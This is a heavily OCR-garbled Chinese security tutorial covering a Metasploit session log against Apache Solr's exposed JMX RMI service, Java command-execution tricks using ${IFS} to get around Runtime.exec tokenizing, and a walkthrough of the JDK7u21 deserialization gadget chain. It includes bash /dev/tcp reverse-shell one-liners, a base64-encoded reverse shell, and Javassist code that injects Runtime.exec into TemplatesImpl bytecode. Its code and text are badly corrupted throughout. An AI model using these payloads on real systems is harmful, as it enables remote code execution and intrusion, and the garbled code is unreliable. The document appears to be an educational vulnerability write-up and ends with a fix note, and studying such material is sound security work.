18983 - Using URL: http://0.0.0.0:8080/jZoQb6ce83 
Local IP: http://198.18.0.1:8080/jZoQb6ce83 
Sending RMI Header... 
- Discovering the JMXRMI endpoint... 
JMXRMI endpoint on 127.0.1.1:18983 O08 s 4 
Proceeding with handshake,.. weirdbirdes7Q E 
k 1 r Qwei r AKE AET $ netstat -anp | grep 18983 
es le: Sir! Sohbet Re (Not all processes could be identified, non-owned process info 
; xp will not you ta be aid all. 
Replied to request for mlet fest no + cl you would have to be root to see it all.) ites, 
Replied to request for payload JAR Ue RE e RIEN TEE Me t 
Executing payloads Vel rdbirdeevaneirabicaeey: 
53928 bytes) to 172.16,194.138 ir weirdbirdee?; 
ssion 1 opened (172.16.194.1:4444 -> 172.16.194.138:58636) at 2019-1 


nfo 

rdbirdee7 

x 4,15.0-70-generic (amd64) 
inux 


jird007) gid=1000(weirdbirdðð7) groups=1000(weirdbirdee7), 4(adn), 24(cdr« 












395-4099«UP,BROADCAST,MULTICAST» mtu 1500 
netmask 255.255.0.0 broadcast 172.18.255. 
cB:bf:18 txqueuelen 9 (Ethernet) 
bytes @ (0.0 8) 
dropped @ overruns @ frame 0 
bytes @ (0.0 B) 
dropped © overruns ® carrier © collisions @ 


RMI Lnterfage 


C with an aut 
th an authent 


Je CIDR ident 


195-4099«UP, BROADCAST,MULTICAST> mtu 1500 
20.0.1 netmask 255 @.0 broadcast 172,20,255. 
e:14:19:d6 txqueuelen @ (Ethernet) 
@ bytes 0 (0.0 8) 
@ dropped 0 overruns @ frame 8 
à bytes © (0.0 B) 
D d pped @ overruns @ carrier 0 collisions @ 


| on. This m 
: OR 


4099<UP, BROADCAST, MULTICAST> mtu 1500 
netmask 255.255.0.0 broadcast 172.19.255. 
87:7d txqueuelen @ (Ethernet) 

bytes 0 (0.0 B) 
dropped @ overruns @ frame 8 
s 0 (8.8 B) 
ed 8 overruns 0. carrier @ collisions 9 


tificate (de 
exploit (def 


UP,BROADCAST,MULTICAST» | atu 1500 
.0.1 netmask 255,255.0.0 broadcast 172.17.255. 
:a6:7a:8f:22  txquevelen @ (Ethernet) 


结束 语 与 防护 


是 忽 使 用 本 文 探讨 技术 进行 非法 攻击 ， 目 前 solr 的 jmx 开 启 场景 目前 主要 也 是 会 在 内 网 开启 较 多 。 
修复 方式 














修改 Apache solr 的 bin 目 录 里 的 solr.in.sh 配 置 文件 中 的 ENABLE_REMOTE_JMX_OPTS 字 段 值 为 
ase 或 者 升级 solr 版 本 ， 修 改 完 配 置 需要 重启 服务 才能 生效 ， 并 且 启 用 Solr JMX 服务 身份 验证 。 





.1:18983 


58636) at 


399 



































































































































































































































































































































































































































java 命 令 执 行 小 细节 
熟知 的 在 java 下 执行 系统 命令 的 代码 


Runtime.getRuntime().exec() 
new ProcessBuilder().start() 


众所周知 ， 仅 在 命令 前 加 了 /bin/bash -c， 才 能 使 用 特殊 符号 , 如 ; | > 等 


使 用 ${IFS} 
测试 代码 : 


1 


String stringa" xxx"; 

InputStream in=Runtime.getRuntime().exec(string).getInputStream(); 
Scanner scanner = new Scanner(in).useDelimiter( 4"); 
System.out.println(scanner.hasNext() ? scanner.next() : "); 


。 XXX- echo -n 123 输出 


123 


XXX2 /bin/bash -c echo -n 123 输出 为 空 


Xxx= /bin/bash -c echo$(IFS)123 输出 


123 


xxx= /bin/bash -c x=3;echo${IFS}$x 输出 


。 XXX- /bin/bash -c ls|grep$(IFS)i.txt 输出 


ux 


e XXX= /bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/127.0.0.1/8888<81 可 反 
弹 ， /bin/bash -c 其 后 不 能 有 空格 等 





。 xxx= bash$(IFS)-i$(IFS)»&/dev/tcp/127.0.0.1/8888-«&1 不 可 反弹 ， 由 于 无 法 识别 到 
一 个 参数 
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: /bin/bash -c echo bash${IFS}-i${IFS}>&/dev/tcp/127.0.0.1/8888<&1 不 可 反 
echo 后 有 空格 

| /bàn/bash -c echo${IFS}-n${IFS}bash${IFs} - 
[FS)»&/dev/tcp/127.0.0.1/8888«&1 可 反弹 ， 同 理 


于 头 不 包含 /bin/bash -c， 且 不 含 特殊 符号 如 >;${IFS} 等 ， 仅 含有 参数 -r-c 及 参数 值 


The Internal Field Separator that is used for word splitting a 


> 


X we 
“$echo -n "${IFS}"|hexdump 得 到 其 值 为 20 09 oa ， 与 默认 值 <space><tab> 


<newline> 对 应 














Xec 中 使 用 stringTokenizer st = new StringTokenizer(command) 孙 数 进行 分 割 


E 
输入 的 xxx 以 空格 \t\n\r\f 进行 分 割 ， 如 下 为 StringTokenizer 构 造 函数 代码 


| public StringTokenizer(String str) { 
Ehis(str, " \t\n\r\f", false); 
, , 1 


开头 包含 /bin/bash -c ， 则 其 后 不 能 含有 空格 \t\n\r\f ， 否 则 就 会 被 茶 毒 ， 使 系统 无 法 
但 是 可 以 输入 特殊 符号 如 

NAGS RS 

{IFS} 绕 过 StringTokenizer 

in/bash -C 的 前 提 下 ， 可 以 进行 拼接 命令 
ash -c echo;ls|grep$(IFS)1.txt 


未 ， 前 一 条 命令 为 echo; ， 后 一 条 为 1s1grep$fIFS}1,txt 
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Runtime. getRuntime(). exec() 的 第 一 个 参数 为 string 类 型 ， MU HEE String Tokenizer fy#e 
则 /bin/bash -c 与 其 后 命令 存在 空格 \t\nN\rNf 无 法 并 存 。 





public Process g vari) throws IOException { 








return this.exec((String)vari, (String[])nuli, (File)null); 
} 
public Process ) j String[] var2) throws IOExce 
return this.exec((String)vari, var2, (File)null); 
3 
public Process i ri L, Stringi] var2, File r3) throws I 


if (vari.length() == 6) { 
throw new IllegalArgumentException( “Empty command"); 
} else { 
StringTokenizer var4 = new StringTokenizer(vari); 
String[] var5 = new String[var4.countTokens()]; 





















































































































































































































































for(int var6 = ©; var4.hasMoreTokens(); ++var6) { 
var5[var6] = var4.nextToken(); 




























































































































































































return this.exec(var5, var2, var3); 

































































当 第 一 个 参数 类 型 为 String[] 
public Process exec(String[] vari) throws IOException { 
return this.exec((String[])vari, (String[])null, (File)null); 






































































































































} 

public Process exec(String[] vari, String[] var2) throws IOException { 
return this.exec((String[])vari, var2, (File)null); 

} 

public Process exec(String[] vari, String[] var2, File var3) throws I0EMS 





return (new Eroare sU der vari): environment(var2).directory(var3).sta 


} 








































































































而 ProcessBuilder 的 构造 函数 如 下 









































e 以 List<String> vari 为 参数 的 ， 直 接 将 数组 var1 赋 给 命令 command。 
。 以 String... vari 为 参数 的 ， 由 于 存在 command.add(var5); , 在 /bin/bash -C 
命令 即使 存在 空格 \t\n\r\f ， 也 不 会 将 其 分 割 
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THE, 


Processi L«oltring» ve 
== null) { 
hrow new NullPointerException(); 


his.command = vari; 


pe Proces 
[] var2 = vari; 


-var3 = vari.length; 


tring var5 = var2[var4]; 
his.command.add(var5); 


形式 是 最 普遍 被 熟知 的 。 


SACS 


emdold="; echo 123"; 
Emdnew-"1s | grep 1 


bin/bash"); 
Bec"); 


{ 


command = new ArrayList(var1.length); 


(int var4 = 0; var4 < var3; ++var4) { 


样 ， 直 接 将 (/bin/bash、-c、 命 令 ) 用 数组 (可 变 长 ) 形式 分 割 ， 这 样 命令 也 可 直接 使 


txt'"*cmdold; 
St<String> hhh=new ArrayList«String»(^); 
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public ProcessBuilder(List<String> vari) { 


| if (vari == mū EE E 
| throw new NullPointerException(); 
} else { 


| this.command = varl; 


TT } 





size = 


public ProcessBuilder(String... var1) { 


li this.command = new ArrayList(var1.length); 
T String[] var2 = var1; 


int var3 = vari. length; 





for(int var4 = 0; var4 < var3; ++var4) { 


[op -e = 


ProcessBuilder ProcessBuilder() 


L C ie 

M | X Variables 
| | this 
f command = size = 3 

0 = "/bin/bash" 

1 eon 

2 = "is | grep 1.txt;echo 123" 
f directory = null 
f environment = null 
f redirectErrorStream = false 
f redirects = null 


Variables debug info not available 
P varl = size =3 

















new ProcessBuilder("/bin/bash","-c", "1s 















































public ProcessBuilder(String... varl) { va 
thís.command = new ArrayList(var1.length); 
String[] var2 = var1; Lot : i 
int var3 = vari. length; at 











ot 


i for(int var4 = 0; var4 < var3; ++var4) { 
HY String var5 = var2[var4]; t 
this, command. add(var5); 





} 


TORE E a ET 





public ProcessBuilder command(List<String> vari) { 
if (vari == null) ( 


WA 





IU ProcessBuilder ProcessBuilder() 


mo Ed 


D. i 党 Variables 


























this 

Wi f command = size = 3 
| 0 = "Ibin/bash" 

| Tat 
lil 2 = "Is | grep 1. txt; echo 123" 
Wl directory = null 





c 


environment = null 





redirectErrorStream - false 
redirects = null 


使 用 $@ 
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cc dd ee ff 


) |bash 2.txt 


j 


取 对 应 的 变量 。 该 文章 写 了 so 与 $* 的 区 别 


Fesdn.net/wh larticle/details/7187639 





h xxx string 命令 ， 若 xx 为 空 或 者 找 不 到 ， 则 将 变 成 stringlbash 


Bitibin/bash -c 之 后 的 命令 不 准 含 空格 等 字符 的 限制 ， 来 执行 命令 ， 如 下 


-c $@|bash © echo 命令 
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bash -i »&/dev/tcp/127.0.0.1/8888«&1 ? Fe 
对 应 


bash -c (echo, YmFzaCAtaSA*-Ji9kZXYvdGNwLzEyNy4wL j AuMS840Dg4PCYX] | (base64, 


base64 解 码 之 后 的 内 容 就 是 bash -i »&/dev/tcp/127.0.0.1/8888«&1 
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K 反 序 列 化 Gadgets-7u21 


gika: 30-60 分 钟 AB: 约 16k 字 
(base6a, -dj 时 


ond. 24 版 本 的 反 序列 化 利用 方式 知道 有 使 用 jdk7u21 的 版 本 利用 链 ，ysoserial 利 用 工具 中 也 
制 用 链 。 现 在 都 是 7u80 版 本 了 ， 这 个 漏洞 真正 直接 利用 ， 估 计 已 经 很 难 找到 了 。 


六 利 用 链 的 构造 有 很 多 之 前 没 接触 过 的 java 特 性 ， 就 此 好 好 学 习 一 下 ， 也 算是 fastjson 的 前 置 


ra le 官网 下 载 ， 漏 洞 影响 7u25 之 前 的 版 本 ， 整 条 链 poc 和 貌似 只 适用 于 7u21 以 









说 这 是 JDK 反 序列 化 链 ， 是 因为 这 个 链 中 所 有 利用 类 都 是 jdk 自 带 的 类 ， 其 中 payload 最 终 关 
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 类 o 

yso erial 源 码 中 抠 出 7u21 的 利用 代码 来 分 析 ， 具 体 代码 由 于 比较 长 ， 不 全 部 在 此 贴 出 ， 只 截 
的 部 分 ， 所 有 代码 已 上 传 o 
21 java 是 一 个 包含 基础 核心 原理 POC。 (Gadgets 类 参考 github， 或 者 可 以 去 ysoserial 中 


public static void throws Exception { 
TemplatesImpl calc = (TemplatesImpl) Gadgets.createTemplatesImpl(‘calc") 


calc.getOutputProperties(); 







Templat 





BBlison£g (^ | 
4 UtputProperties 方 法 ， 来 确认 恶意 Templatesimpl 类 calc 需要 的 条 件 ， 先 看 调用 栈 : 







r Stance 
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从 调用 栈 中 ， 可 见 最 后 是 obj.newInstance (obj 是 虚 指 ) 触发 poc 执 行 恶 意 代码 ， T" 
之 后 就 是 java class 类 的 newlnsatance 内 部 实现 了 ， 不 细 纠 。 


newinstance 实 例 化 会 默认 触发 执行 static 方 法 ， 构 造 方法 代码 ， 如 下 : 








所 以 我 们 的 payload 需 要 放 在 最 后 执行 的 恶意 类 的 static 或 构造 方法 中 。 知 道 这 点 后 ， 我 们 人 
慢 慢 寻找 其 他 需要 条 件 。 


IRA TemplatesImpl 类 的 getOutputProperties75X : 


newTransformer().getOutputProperties(); 


(TransformerConfigurationException e) { 


Ly 


com.sun.org.apache.xalan.internal.xsltc.trax. TemplatesImpl#newTransformer 方 法 
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isformer ne 





ic synchronized 1 i T 
E Un onException 
TransformerImpl transformer; 
transformer = new TransformerImpl(getTransletInstance(), _outputProperti 


_indentNumber, _tfactory); i 


af (_uriResolver != null) { 
transformer .setURIResolver(_uriResolver); 


if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) { 
transformer.setSecureProcessing(true); 


} 


return transformer; 


in.org.apache. xalan. internal. xsltc.trax.TemplatesImpl#getTransletInstance 


ie Translet 
throws TransformerConfigurationException { 
ery { 


if (_name == null) return null; 
if (_class == null) defineTransletClasses(); 


ey 


ner 方 法 1 AbstractTranslet translet = (AbstractTranslet)  class[ transletIndex 


ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET OBJECT ERR, | name); 
throw new TransformerConfigurationException(err.toString()); 


ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET OBJECT ERR, name); 


throw new TransformerConfigurationException(err.toString()); 





409 








在 漏洞 代码 执行 AbstractTranslet translet = (AbstractTranslet) 


.class[ transletIndex]. newInstance( ); 前 ， 


先 经 
过 com.sun.org.apache.xalan.internal.xsltc.trax. TemplatesImplédefineTrag 


es 方法 
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tClasses() , * E 
i ionException { 


变量 1 =null 


E void def 

Mthrows Transfor 
EREI ; 
mar ( bytecodes == null) ( 


ErrorMsg err = new ErrorMsg(ErrorMsg.NO TRANSLET. CLASS ERR); 


throw new TransformerConfigurationException(err.toString()); 








b 

| A) 

~ TransletClassLoader loader = (TransletClassLoader) 

AccessController.doPrivileged(new PrivilegedAction() { 
public Object { 


return new 


i /7/ 

insletClassLoader (ObjectFactory.findClassLoader(), tfactory.getExternalExte 
} 

3 


try ( 
PANE : 
final int classCount = _bytecodes.length; 
class = new Class[classCount]; 


feo(classCount > 1) { 
_auxClasses = new Hashtable(); 


man (int i = 9; i < classCount; i++) { 


3 wee i garler 
issLOoader 





.class[i] = loader.defineClass(  bytecodes[i]); 


/ ARK AS I 


final Class superClass =  class[i].getSuperclass(); 


将 获取 c 


ACT TRANSLET 





by à EABSTI | NSLETI 

if (superClass.getName().equals(ABSTRACT. TRANSLET)) 1 
_transletIndex = i; 

} 

else { 
.auxClasses.put( class[i].getName(), .class[i]); 

} 

J 


if (_transletIndex < ©) { 
ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name) 


throw new TransformerConfigurationException(err.toString()); 
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} 
(ClassFormatError e) { 
ErrorMsg err = ErrorMsg(ErrorMsg.TRANSLET CLASS ERR name) 
TransformerConfigurationException(err.toString()), 
j 
(LinkageError e) { 
ErrorMsg err - ErrorMsg(ErrorMsg.TRANSLET OBJECT ERR, name 
TransformerConfigurationException(err.toString()); 
j 
j 
_tfactory 与 jdk 版 本 


其 中 的 限制 条 件 4 _tfactory 这 个 参数 是 有 说 法 的 ， 在 其 他 人 博客 中 有 存在 对 于 _tfactory HERR 
AR: 


但 其 实 这 跟 jdk 版 本 是 有 关 的 ，1.7 下 不 同 的 jdk 版 本 这 段 代 码 是 不 同 的 。 
1.7u80 版 本 


的 com.sun. org.apache.xalan.internal.xsltc.trax.TemplatesImpl#defineTransletClas 


es 中 就 是 存在 这 句 代码 的 。 


 tfactory.getExternalExtensionsMap() 











在 1.7u80 中 ， 注 释 Gadgets 类 中 添加  tfactory 这 个 字段 的 代码 后 (之 后 我 们 将 详细 分 析 
Gadgets 类 ) ，_tfactory=null 就 会 发 生 null 指 针 报错 。 


A12 


Reflections. se ¢ >(templates 







Gadgets createTemplatesimpit} 





: 竟 ， 却 可 以 成 功 执行 ， 
HU21 的 情况 下 并 没有 _tfactory.getExternalExtensionsMap() 这 人 句 代 码 。 


letClass 








rMsg(Érrc 





ÉrrorMsg err 





TransformenConfigurati 


Exception(err 





9 





€lass(classCount] 


f (classCount » 1) ( 


Hashtable() 


| ^ Templatesimpl © detineTransietClasses() 





he target VM; address: 





!127:9.0. 





472*, transport; ‘socket’ 






dddress:.512710,0.1:13472', transport: ‘socket’ 


'inished with iexithegde dt 





















































































但 是 1.7u21 也 可 以 兼容 给 _tfactory 赋 值 的 情况 ， 所 以 还 是 给 _tfactory 赋值 比较 好 ， 可 以 
版 本 。 


Templatesimpl 恶 意 类 的 限制 条 件 


至 此 总 结 我 们 构筑 一 个 恶意 的 Templatesimpl 类 ， 在 调用 这 个 恶意 类 的 getOutputPropertig 
需要 满足 的 限制 条 件 。 即 ， 构 筑 恶 意 Templatesimpl 类 的 需要 条 件 。 


1. Templatesimpl 类 的 _name 变量 != null 

2. Templateslmpl2 B3 _class 变量 == null 

3. Templatesimpl 类 的  bytecodes 变量 != null 

4. Templatesimpl 类 的 _tfactory 需要 是 一 个 拥有 getExternalExtensionsMap() 方 法 的 类 | 
jdk 自 带 的 TransformerFactoryImpl 类 

5. Templatesimpl 类 的 _bytecodes 是 我 们 代码 执行 的 类 的 字 节 码 。 _bytecodes 中 的 类 
是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的 


6. 我 们 需要 执行 的 恶意 代码 写 在 _bytecodes 变量 对 应 的 类 的 静态 方法 或 构造 方法 中 。 


构筑 POC 
回首 漏洞 原理 的 POC 


public static void throws Exception { 


TemplatesImpl calc = (TemplatesImpl) Gadgets.createTemplatesImpl( calc" 


calc.getOutputProperties(); 


在 分 析 完 第 二 句 触发 漏洞 的 语句 后 。 回 来 看 第 一 句 构筑 。 由 于 需要 动态 对 于 类 结构 进行 操作 ， 
用 到 Javassist 包 


Gadgets 是 ysoserial 自 主 构建 的 一 个 利用 类 ， 看 其 中 的 createTemplateslmp| 方 法 : 
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ETS 


E etic Ten jsImpl createTemplatesImpl(final String command) throws 
j » 
final ia Sn = new TemplatesImpl(); 


wi 


‘ies >》 


E... nsletPas ; 
[final CtClass clazz = pool. get(Stubtranstecrar cR DD Mime); 
ey 2.8) (c. So UM 

BU RUE: 

clazz. E ert) 


.insertAfter(" i, lang.Runtime.getRuntime( ).exec(^"" 
RED YY + to NE PENS ae) 
鸭子 类 Dex. 
| B 3. 
o 


Miclazz.setName("ysoserial.Pwner" + System.nanoTime()); 
Eua. BRI 
final byte[] classBytes = clazz.toBytecode(); 


Ey 4. 

E ALES 1 | 

. Reflections. satrialdvdlüsCténpISÉes, " bytecodes", new byte[]I[] { 
ale" | classBytes, 

ClassFiles.classAsBytes(Foo.class))); 

EN 5. 满足 条 件 1: T. | | 

Reflections. cio epe une al " name", "Pwnr"); 

EN 6. 满足 条 件 4: 4 platesīmplžý ctory 是 一 个 拥有 getEXternalExt: 

E EB ov setrieldvalue( templates, " tfactory", new TransformerFactory 
a XX 8i I aS HH E 1 

Beo: plates; 


E, 


StubTransletPayload 类 的 继承 。 
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$ wStractTranslet 


public static class i 1 eti jad extends implege 





static final long serialVersionUID - - 


@Override 





HAAR EtemplatesKMULBFE_bytecodes, _name, _tfactory 这 些 属 性 中 塞 数据 
的 Reflections.setFieldValue 方法 。 这 里 是 通过 反射 机 制 修改 私有 属性 。 


public static id final Final 
final Field field = getField(obj.getClass(), fieldName); 
field.set(obj, value); 

} 

public static Field final final 
Field field - clazz.getDeclaredField(fieldName); 
if (field != null) 

field.setAccessible(true); 

else if (clazz.getSuperclass() != null) 


field - getField(clazz.getSuperclass(), fieldName); 
return field; 


可 以 看 到 上 面 的 Gadgets 类 完美 符合 了 我 们 之 前 在 利用 过 程 中 提 到 的 全 部 需要 条 件 。 但 是 Gadge 
构造 的 恶意 Templatesimpl 类 比 起 我 们 需要 的 POC 条 件 多 1 处 东西 : 


1. _bytecodes 多 加 了 一 个 Foo.class 类 


我 始终 没有 找到 这 个 到 底 有 喻 用， 去 掉 后 实验 ， 没 有 任何 影响 。 如 果 有 老 哥 知道 ， 可 以 联系 我 ， 
常 感谢 。 


payload 位 置 static 与 构造 函数 


自己 构造 一 波 payload， 再 分 析 一 个 payload 放 置 位 置 的 问题 
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lic class jdk7 { 


} ; * pe 
1 EM lala EBX : 
E “public static class { 
ies 
Epublic static void throws Exception { 
= ClassPool pool = ClassPool.getDefault(); 
ctClass cc = pool.get(lala.class.getName()); 
E String cmd = "java.lang.Runtime.getRuntime().exec(N"calcN");"; 
7/2 8) 141 ; 
// ct 
RES, 


CtConstructor cons = new CtConstructor(new CtClass[]{}, cc); 
cons.setBody("{"+cmd+"}"); 

6C. addconstructor (cons); 

7/38 38 

String randomClassName = "5/3 '"*System.nanoTime(); 

cc. ES E 

[lis A er 

EC. setsuperelass( (pool. get(AbstractTranslet.class.getName()))); 





Bier] dts - cc.toBytecode(); 

byte[][] targetByteCodes = new byte[][]{lalaByteCodes}; 

TemplatesImpl templates = TemplatesImpl.class.newInstance(); 
Reflections.setFieldValue(templates," bytecodes",targetByteCodes); 
Reflections.setFieldValue(templates,” name”, lala'+System.nanoTime()); 
Reflections.setFieldValue(templates, " c. ae NP 
Reflections.setFieldValue(templates," tíactory",new TransformerFactoryIm 









E ees. qetoutpurPropsrttes y 
//—3ME p] 


template 1 


ets 
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Make ‘lala’ static 







至 此 我 们 完成 了 恶意 Templates 类 构造 以 及 TemplatesImpl.getOutputProperties 触发 点 的 分 

(当然 从 上 面 的 调用 过 程 ， 我 们 知道 直接 调用 TemplatesImpl.newTransformer() 也 是 一 样 的 
getOutputProperties 其 实 就 是 调用 了 newTransformer()， 在 接 下 来 的 延长 链 中 其 实 漏洞 触发 是 在 
newTransformer) 。 


目前 的 结论 已 经 可 以 移花接木 到 fastjison 的 利用 链 中 形成 一 套 完成 利用 链 。 以 及 其 他 很 多 组 件 的 种 
链 的 最 后 一 步 都 是 Templatesimpl 类 (限于 jdk1.7 版 本 ，1.8 会 编译 错误 ， 原 因 未 知 ) 。 


延伸 到 一 个 反 序 列 化 readObject 点 ， 使 服务 端 一 触发 反 序列 化 ， 就 可 以 沿 着 利用 链 到 exp 触 发 点 。 


延长 利用 链 一 一 AnnotationlnvocationHandler 


AnnotationlnvocationHandler 这 是 一 个 熟悉 的 类 ， 在 commons-collections 一 文 的 1.7 最 基础 的 利用 
链 中 ， 我 们 正 是 使 用 了 AnnotationlnvocationHandler 的 readobject 函 数 作为 反 序 列 化 入 口 点 。 


然而 这 里 跟 AnnotationtnvocationHandler 的 invoke 函 数 有 关 。 在 这 之 前 我 们 需要 先 了 解 java 的 动态 
代理 性 ALO 


动态 代理 


动态 代理 是 java 的 特性 之 一 ， 其 实 就 可 以 理解 为 web 应 用 中 的 拦截 器 ， 在 执行 正式 代码 之 前 先 过 一 
个 拦截 器 函数 (比如 spring 的 AOP) 。 但 是 以 上 类 比 只 是 为 了 便于 理解 ， 实际 上 spring 的 AOP 之 类 
的 拦截 器 反而 是 基于 java 的 动态 代理 实现 的 。 


下 面 将 举例 动态 代理 Subjectlmpl 类 ， 即 在 Subiectimple 类 前 面 建立 一 个 拦截 器 。 


DynamicProxy ,java 
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的 » > > 
r1 java.lang.reflect.InvocationHandler; 

+ java.lang.reflect.Method; 

"t java.lang.reflect.Proxy; 


face IS { 
üublic void : 


i t { 
iblic void { 
hi 
System.out.println( * str); 
idler xj 
Boat ionHan 
发 点 的 } Mandler implements { 
是 一 样 的 subject; 
WREE E SN 
a BEIC Handl: { 


this.subject = subject; 
> 组件 的 利 
IBroxyti-ii 

| Blic Object throws Thi 
] 需 要 继 ESystem.out .println("before!"); 

触发 点 完成 拦 工控 

method. invoke(this.subject, args); 

System.out .print1ln("after!"); 

return null; 


SS Dynan { 
Static void { 


S bjectImpl subject = new SubjectImpl(); 
InvocationHandler tempHandler = new Handler(subject); 
BKY .newb: 


Subject isubject - (ISubject) Proxy.newProxyInstance(DynamicProxy.class 
Bibject .he11o("wor1d!"); 


L 
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FN TW > 
i Proxy.newProxyInstance 三 个 传 入 参数 : 
ul e loader， 选 用 的 类 加 载 器 。 感 觉 随便 选 就 好 了 。 


My e interfaces， 被 代理 类 所 实现 的 接口 ， 这 个 接口 可 以 是 多 个 。 〈 即 需要 拦截 的 接口 ) 
。 hh, 一 个 实现 拦截 器 的 invocation handler. 


之 后 只 要 我 们 调用 了 返回 之 后 的 对 象 中 被 安排 了 代理 的 接口 ， 就 会 进入 invocationHandler 的 in 
函数 。 


以 上 执行 结果 就 是 : 























before! 
SubjectImpl.hello(): world! 
after! 














那么 动态 代理 大 概 就 分 为 几 个 部 分 : 


1. 被 代理 的 接口 类 

2. 被 代理 的 接口 类 的 实现 类 

3. 继承 invocationHandler 接 口 、 实 现 invoke 方 法 的 拦截 器 类 

4. Proxy.newProxyinstance 完 成 拦截 器 ， 与 被 代理 的 接口 类 的 绑 定 

5. 调用 这 个 返回 对 象 的 被 代理 接口 即 可 。 (此 处 注意 这 个 返回 的 对 象 不 是 只 有 被 代理 的 接口 
的 接口 ， 还 有 一 些 常用 接口 ， 之 后 会 截图 说 明 。) 


我 们 说 了 那么 多 动态 代理 机 制 ， 是 为 啥 呢 ? 

































class Annotationinvo LonHand implements | / big 






































public Object ii jer l i | ana) 









































3 





























其 实 就 是 因为 AnnotationtnvocationHandler 类 其 实 是 一 个 InvocationHandler 接 口 的 实现 类 。 它 
是 在 cc 的 利用 链 中 作为 反 序 列 化 点 ， 还 是 作为 动态 代理 的 拦截 器 实现 函数 (有 一 个 自己 的 invoke 
i) 









































动态 代理 链接 AnnotationlnvocationHandler 与 Templates 

















我 们 的 目的 是 连接 代理 后 的 对 象 Proxy 的 equal 方 法 到 Templates 的 newTransformer 方 法 。 
当 建 立 动态 代理 后 (Proxy.newlnstance 返 回 一 个 对 象 a) ， 我 们 假设 调用 a.b(c) 




















先 晤 一 眼 AnnotationlnvocationHandler 的 构造 函数 有 个 底 ， 我 们 可 以 知道 有 可 控 的 this.type 与 


this. memberValues 
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—this.type = vari; 
 this.memberValues = var2; 





{ 
String var4 = var2.getName(); 
Class[] var5 = var2.getParameterTypes(); 
Z5 | 
if (var4.equals(' equals") && var5.length == 1 && var5[6] == Object.class 


return this.equalsImpl(var3[^]); 
else { 


ct .annotation.AnnotationInvocationHandler&equalsImpl 
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private Boolean l{Object vari) { 





if (vari == this 





} else if (!this.type.isInstance(vari)) { 


Method[] var2 = this.getMemberMethods(); 
nt var3 = var2.length; 


jr(int var4 = ©; var4 < var3; ++var4) { 
Method var5 = var2[var4]; 
String var6 
Object var7 this.memberValues.get(var6); 
Object vars = null; 


n 


var5.getName(); 


AnnotationInvocationHandler var9 = this.asOneOfUs(var1); 
if (var9 !- null) { 
var8 - var9.memberValues.get(var6); 


pease [f 




















LIH 


var8 = var5.invoke(var1); 





















































} catch (InvocationTargetException varii) { 
return false; 

) catch (IllegalAccessException var12) { 
throw new AssertionError(var12); 


if (!memberValueEquals(var7, var8)) { 
Ill return false; 


| 3 





equals 方 法 会 根据 this.type 类 中 的 方法 去 遍历 调用 传 入 对 象 中 的 所 有 对 应 的 方法 。 那 么 ! 


1. 我 们 可 以 构筑 一 个 AnnotationinvocationHandler 类 ， 构 造 函数 中 选择 一 个 this.type， this .type 这 
个 类 中 需要 包含 我 们 要 恶意 执行 的 方法 。 
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2:93 T AnnotationInvocationHandlerze SPER t A E OT abe (因为 我 们 需要 调用 的 是 
equals， 只 要 是 一 个 Object 对 象 就 会 有 equals 方 法 maybe? ) 
E HashMap() ; 


onstructor<?> ctor = Class.forName( 
ssible(: ) 





landler invocationHandler = (InvocationHandler) ctor.newInstance(Override 


.setFieldVaLlue(invocationHandler Templates. ) 
proxy = (Templates) Proxy.newProxyInstance(InvocationHandler. 
ject templates = Gadgets.createTempLatesImpl ( 
xy. equals (temp a ; 
uem 
; newTransformer ( ) 


„getClass 


equals (Object 

hCode 
toString ( 
getClass ( 
notify 
notifyAll 
wait 


r1); 





实例 申 的 对 应 方法 进行 调用 。 唯 一 的 缺点 就 是 调用 的 方法 不 能 传 入 参数 。 (A 
A VarS.invoke(vari1); 只 传 入 了 对 象 ， 没 有 传 入 参数 ) 


我 们 需要 调用 的 是 TemplatesImpl.newTransformer() ， 刚 好 这 个 方法 不 需要 传 入 参数 ! 


®itihis.type=Templates.class, 因为 Templatesimpl 继 承 自 Templates 接 口 ， 并 且 它 有 我 们 要 的 方 
四 让 在 第 一 个 (为 哈 需要 恰好 又 刚好 在 第 一 个 ， 之 后 有 说 法 ) 。 
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Map map = HashMap(); 
Constructor<?> ctor = Class. forName( nd 
ctor.setAccessible( Ni 


InvocationHandler invocationHandler = (InvocationHandler) ctor. newim 


Override proxy = (Override) Proxy.newProxyInstance(InvocationHandler ¢ 
Object templates = Gadgets.createTemplatesImpl( M 


proxy.equals(templates); 


this.type 的 讲究 
为 啥 this.type 需 要 选用 类 中 第 一 个 方法 是 我 们 需要 调用 的 方法 的 类 呢 ? 


因为 不 是 的 话 ， 就 需要 考虑 更 多 ， 比 如 报错 退出 。 可 以 看 到 在 执行 完 我 们 的 payload 后 是 会 报错 
的 ， 当 然 这 对 我 们 paylaod 的 执行 没有 影响 。 






apertis)" s 





但 是 假如 我 们 需要 调用 的 方法 不 在 第 一 个 ， 而 前 面 是 一 个 需要 参数 的 方法 ， 就 会 因为 没有 传 入 参数 
而 报错 退出 。 (比如 我 们 把 Templates.class 改 成 Templatesimpl.class) 
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tor, newInstar 


nHandler cle 


2055524188233 FH 8375 7 8603 ERWA, PERETRESAN, RLSM 
thismemberValues, LLAI XE RAPERE Sthis.menberValues#M—M7 Fi [Blfalse3R 
Mea ROR (目前 来 看 这 样 也 是 可 行 的 ， 但 是 假如 这 里 真 的 改 了 this.memberValues 之 后 
而 [EdashSset 那 关 就 过 不 去 了 ! 实际 上 我 们 只 能 且 必 须要 找到 一 个 第 一 个 方法 是 能 够 代码 执行 的 
方法 ! ) 


陆 圣 我们 可 以 找到 一 个 Templates 类 ， 它 进行 代码 执行 的 方法 是 第 一 个 ， 万 幸 。 





A- DFE AZ LinkedHashSet 


接 下 来 需要 触发 proxy.equals(templates) ， 这 种 a.equals(b) 的 形式 。 a 是 我 们 构建 的 动态 
代理 返回 对 象 ，b 是 恶意 TemplatesImp| 类 。 


inkeqHashset 类 继承 自 Hashset， 具有 Hashset 的 全 部 特点 : 元 素 不 重复 ， 快 速 查找 ， 快 速 插 
NESS, ， 数 据 结构 上 使 用 双向 链表 实现 。 (之 所 以 用 LinkedHashSet 就 是 因为 其 有 
